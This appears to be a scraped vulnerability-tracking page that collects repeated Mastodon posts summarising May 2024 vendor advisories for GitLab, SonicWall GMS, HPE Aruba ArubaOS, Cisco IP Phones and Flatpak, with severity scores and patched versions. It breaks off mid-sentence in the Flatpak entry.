Related: "CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability"

"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild.

Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address."
👇
thehackernews.com/2024/05/cisa

##

AAKL at 2024-05-01T15:41:18.755Z ##

# CISA Adds CVE-2023-7028 - Community and Enterprise Editions Improper Access Control Vulnerability to Catalog cisa.gov/news-events/alerts/20 @cisacyber

##

decio@infosec.exchange at 2024-05-02T07:06:38.000Z ##

Related: "CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability"

"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting #GitLab to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild.

Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address."
👇
thehackernews.com/2024/05/cisa

##

AAKL@infosec.exchange at 2024-05-01T15:41:18.000Z ##

# CISA Adds CVE-2023-7028 - #GitLab Community and Enterprise Editions Improper Access Control Vulnerability to Catalog #cybersecurity #infosec cisa.gov/news-events/alerts/20 @cisacyber

##

CVE-2024-29011
(7.5 HIGH)

EPSS: 0.04%

updated 2024-05-01T21:30:46

4 posts

Use of hard-coded password in the GMS ECM endpoint leading to authentication bypass vulnerability. This issue affects GMS: 9.3.4 and earlier versions.

screaminggoat at 2024-04-30T19:43:57.721Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

##

screaminggoat@infosec.exchange at 2024-04-30T19:43:57.000Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

##

screaminggoat at 2024-04-30T19:43:57.721Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

##

screaminggoat@infosec.exchange at 2024-04-30T19:43:57.000Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

##

CVE-2024-26305
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-05-01T19:50:25.633000

12 posts

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

mttaggart@infosec.town at 2024-05-01T22:58:08.693Z ##

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

#CVE_2024_26305 #Aruba #ThreatIntel

##

mttaggart@infosec.town at 2024-05-01T22:49:41.085Z ##

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

More vulns in the replies.

www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-004.txt
support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04640en_us&docLocale=en_US

#Aruba #CVE #ThreatIntel #CVE_2024_26305

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

mttaggart@infosec.town at 2024-05-01T22:58:08.693Z ##

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

#CVE_2024_26305 #Aruba #ThreatIntel

##

mttaggart@infosec.town at 2024-05-01T22:49:41.085Z ##

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

More vulns in the replies.

www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-004.txt
support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04640en_us&docLocale=en_US

#Aruba #CVE #ThreatIntel #CVE_2024_26305

##

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

mttaggart@infosec.town at 2024-05-01T22:58:08.693Z ##

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

#CVE_2024_26305 #Aruba #ThreatIntel

##

mttaggart@infosec.town at 2024-05-01T22:49:41.085Z ##

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

More vulns in the replies.

www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-004.txt
support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04640en_us&docLocale=en_US

#Aruba #CVE #ThreatIntel #CVE_2024_26305

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

mttaggart@infosec.town at 2024-05-01T22:58:08.693Z ##

CVE-2024-26304: CVSS 9.8

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

#CVE_2024_26305 #Aruba #ThreatIntel

##

mttaggart@infosec.town at 2024-05-01T22:49:41.085Z ##

CVSS 9.8 Buffer overflow -> RCE in ArubaOS:

There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products 
================= 
HPE Aruba Networking 
  - Mobility Conductor (formerly Mobility Master) 
  - Mobility Controllers 
  - WLAN Gateways and SD-WAN Gateways managed by Aruba Central 
  
Affected Software Versions: 
  - ArubaOS 10.5.x.x:       10.5.1.0 and below 
  - ArubaOS 10.4.x.x:       10.4.1.0 and below 
  - ArubaOS 8.11.x.x:       8.11.2.1 and below 
  - ArubaOS 8.10.x.x:       8.10.0.10 and below 
  
The following ArubaOS and SD-WAN software versions that are End 
of Maintenance are affected by these vulnerabilities and are not 
patched by this advisory: 
  - ArubaOS 10.3.x.x:          all 
  - ArubaOS 8.9.x.x:           all 
  - ArubaOS 8.8.x.x:           all 
  - ArubaOS 8.7.x.x:           all 
  - ArubaOS 8.6.x.x:           all 
  - ArubaOS 6.5.4.x:           all 
  - SD-WAN 8.7.0.0-2.3.0.x:    all 
  - SD-WAN 8.6.0.4-2.2.x.x:    all 

More vulns in the replies.

www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-004.txt
support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04640en_us&docLocale=en_US

#Aruba #CVE #ThreatIntel #CVE_2024_26305

##

CVE-2024-20357
(5.9 MEDIUM)

EPSS: 0.04%

updated 2024-05-01T19:50:25.633000

4 posts

A vulnerability in the XML service of Cisco IP Phone firmware could allow an unauthenticated, remote attacker to initiate phone calls on an affected device. This vulnerability exists because bounds-checking does not occur while parsing XML requests. An attacker could exploit this vulnerability by sending a crafted XML request to an affected device. A successful exploit could allow the attacke

screaminggoat at 2024-05-01T16:15:53.789Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T16:15:53.000Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

##

screaminggoat at 2024-05-01T16:15:53.789Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T16:15:53.000Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

##

CVE-2024-20376
(7.5 HIGH)

EPSS: 0.04%

updated 2024-05-01T18:31:25

4 posts

A vulnerability in the web-based management interface of Cisco IP Phone firmware could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a DoS condition. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an aff

screaminggoat at 2024-05-01T16:15:53.789Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T16:15:53.000Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

##

screaminggoat at 2024-05-01T16:15:53.789Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T16:15:53.000Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

##

CVE-2024-29010
(7.1 HIGH)

EPSS: 0.04%

updated 2024-05-01T18:31:20

4 posts

The XML document processed in the GMS ECM URL endpoint is vulnerable to XML external entity (XXE) injection, potentially resulting in the disclosure of sensitive information. This issue affects GMS: 9.3.4 and earlier versions.

screaminggoat at 2024-04-30T19:43:57.721Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

##

screaminggoat@infosec.exchange at 2024-04-30T19:43:57.000Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

##

screaminggoat at 2024-04-30T19:43:57.721Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

##

screaminggoat@infosec.exchange at 2024-04-30T19:43:57.000Z ##

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

  • CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
  • CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

##

CVE-2024-20378
(7.5 HIGH)

EPSS: 0.04%

updated 2024-05-01T18:31:19

4 posts

A vulnerability in the web-based management interface of Cisco IP Phone firmware could allow an unauthenticated, remote attacker to retrieve sensitive information from an affected device. This vulnerability is due to a lack of authentication for specific endpoints of the web-based management interface on an affected device. An attacker could exploit this vulnerability by connecting to the affe

screaminggoat at 2024-05-01T16:15:53.789Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T16:15:53.000Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

##

screaminggoat at 2024-05-01T16:15:53.789Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T16:15:53.000Z ##

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

  • CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
  • CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
  • CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

##

CVE-2024-32462
(8.4 HIGH)

EPSS: 0.04%

updated 2024-05-01T18:15:24.140000

2 posts

Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. in versions before 1.10.9, 1.12.9, 1.14.6, and 1.15.8, a malicious or compromised Flatpak app could execute arbitrary code outside its sandbox. Normally, the `--command` argument of `flatpak run` expects to be given a command to run in the specified Flatpak app, optionally along with some arguments

